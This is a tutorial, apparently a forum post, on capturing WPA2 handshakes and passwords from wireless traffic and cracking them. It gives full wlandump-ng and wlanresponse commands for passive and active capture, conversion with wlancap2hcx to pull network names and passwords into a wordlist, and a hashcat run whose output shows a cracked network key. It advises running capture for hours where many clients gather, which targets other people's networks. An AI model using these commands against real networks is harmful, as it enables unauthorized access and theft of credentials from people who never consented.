basic tutorial about the features to capture passwords from wlantraffic
1.
Choose a place where you do expect to receive many, many clients.
run wlandump-ng or wlanresponse for a while (one or more hours) using this options:
on a notebook
wlandump-ng -i <mywlandevice> -o test.cap -c 1 -t 4 -d 20 -D 2 -m 512 -b -r -l -L -s 20
on a raspberry
wlandump-ng -i <mywlandevice> -o test.cap -c 1 -t 4 -d 20 -D 2 -m 128 -b -r -l -L -s 0
wlanresponse -i <mywlandevice> -o test.cap -t 3 -b -l -L
mydevice is your WLAN device (it must be running allready in monitor mode on a real device - do not use virtual devices like mon0).
Please download and use the attached test.cap for this tutorial
test.cap.zip (Size: 739 bytes / Downloads: 45)
Extract and copy the cap to a folder and open a terminal inside.
2.
Let's check the cap:
$ wlancapinfo -i test.cap
input file.......: test.cap
magic file number: 0xa1b2c3d4 (cap/pcap)
major version....: 2
minor version....: 4
data link type...: 105 (DLT_IEEE802_11) [
http://www.tcpdump.org/linktypes.html]
packets inside...: 6
last pcap error..: flawless
The cap looks like a normal cap, but you should convert it only by using wlancap2hcx, because there are informations inside, other tools are not able to strip.
Let's convert the cap:
$ wlancap2hcx -o test.hccapx -e wordlist test.cap
start reading from test.cap
6 packets processed (6 wlan, 0 lan, 0 loopback)
found 1
wpa2 AES Cipher, HMAC-SHA1
found 1 valid wpa handshake (by wlandump-ng/wlanresponse)
You can see that there's a valid
WPA2 handshakles inside and that
wlandump-ng/wlanresponse initiates the authentication with the client.
No accesspint captured - there is no need to capture an accesspoint to get the data!
We use the -e option to save networknames and passwords to a file (it's a good idea to use this option everytime you run wlancap2hcx).
$ ls
test.hccapx test.cap wordlist
now sort our wordlist
$ sort wordlist | uniq > wordlistsort
you need to do this, because there are many dupes inside.
$ ls
test.hccapx test.cap wordlist wordlistsort
now run hashcat
$ hashcat -m 2500 --potfile-path=hc2500.pot test.hccapx wordlistsort
hashcat (v3.6.0-247-g8f2cbb26) starting...
Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA/
WPA2
Hash.Target......: UPC501953949 (AP:8c:84:01:09:e9:e6 STA:bc:44:86:a1:66:82)
Time.Started.....: Sat Jul 22 09:59:12 2017 (0 secs)
Time.Estimated...: Sat Jul 22 09:59:12 2017 (0 secs)
Guess.Base.......: File (wordlistsort)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 0 H/s (0.36ms)
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 2/2 (100.00%)
Rejected.........: 0/2 (0.00%)
Restore.Point....: 0/2 (0.00%)
Candidates.#1....: AXNDFNEU -> UPC501953949
HWMon.Dev.#1.....: Temp: 42c Fan: 28% Util:100% Core:1303MHz Mem:3004MHz Bus:8
Take a look into the potfile and you can imagine what's going on.
You cracked the hash, using the captured password from wlantraffic.
It's a good Idea to add/copy/cat the wordlist to your wordlist(s) - everytime you run wlancap2hcx on new cap files.